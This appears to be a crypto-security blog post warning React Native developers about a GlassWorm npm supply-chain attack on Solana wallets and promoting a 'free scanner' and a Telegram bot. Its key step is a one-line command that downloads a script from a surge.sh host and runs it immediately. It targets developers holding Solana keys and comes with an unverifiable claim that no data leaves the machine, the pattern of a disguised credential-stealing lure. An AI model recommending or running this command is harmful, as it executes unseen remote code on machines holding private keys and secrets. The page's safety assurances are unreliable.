GlassWorm Hit React Native Packages: 134,887 Monthly Downloads at Risk — Free Scanner
SolGuard SecurityIf you use React Native and have Solana assets — read this now.
What Happened
In mid-March 2026, GlassWorm malware operators backdoored widely-used React Native npm packages with a combined 134,887+ monthly downloads. The attack injected credential-stealing code disguised as routine dependency updates.
The malware does several things once installed:
- Scans for Solana keypair files (~/.config/solana/id.json, .env files containing private keys)
- Exfiltrates stolen keys via Solana blockchain memo program — using your own wallet infrastructure as a dead drop
- Deploys a Chrome extension disguised as offline Google Docs to maintain persistence
- Hides in invisible Unicode characters inside source code — nearly impossible to spot manually
Why React Native Developers Are Prime Targets
React Native devs frequently build mobile crypto wallets, DeFi interfaces, and Solana dApps. The overlap between "React Native developer" and "Solana wallet holder" is near-total. GlassWorm operators know this.
Unlike a typical hack that targets end users, this attack goes after builders — the people with the most assets and the deepest access to protocol infrastructure.
Are You Affected?
The attack targeted packages installed between approximately March 10–20, 2026. If you ran npm install during this window in a React Native project, you should scan immediately.
The free GlassWorm scanner from SolGuard checks:
- package.json and lock files for known malicious packages
- postinstall scripts for suspicious patterns
- Source files for invisible Unicode characters (GlassWorm signature)
- VS Code extensions for backdoors
- Solana wallet memo transactions for signs of exfiltration
Run the Free Scanner (No Install Required)
node -e "$(curl -s https://solguard-security-monitor.surge.sh/scan.js)"
This command runs entirely locally. No data leaves your machine. It takes about 10 seconds and prints a report with any red flags found.
If the Scanner Finds Something
1. Immediately transfer your Solana assets to a fresh keypair generated on a clean machine
2. Rotate all API keys and secrets in the affected project
3. Check Solana Explorer for any unauthorized memo transactions from your address
4. Report the compromised package to npm security: security@npmjs.com
Ongoing Monitoring with SolGuard Bot
The free CLI scanner is a point-in-time check. For continuous monitoring of your Solana address, GlassWorm C2 pattern detection, and real-time hack alerts, use the SolGuard Telegram bot:
→ @SolGuard_Bot on Telegram
The /glassworm command scans any Solana address for C2 memo patterns — the same technique GlassWorm uses to phone home. Free to use.
Background: The GlassWorm Campaign
GlassWorm is an ongoing supply chain attack that has now compromised 400+ repositories across GitHub, npm, PyPI, VS Code, and OpenVSX. It is uniquely crypto-focused: its C2 infrastructure runs entirely on the Solana blockchain, using memo program transactions to receive instructions and exfiltrate data.
This design makes it resistant to traditional threat intelligence — there is no domain to block, no IP to blacklist. Detection requires scanning blockchain data, not network traffic.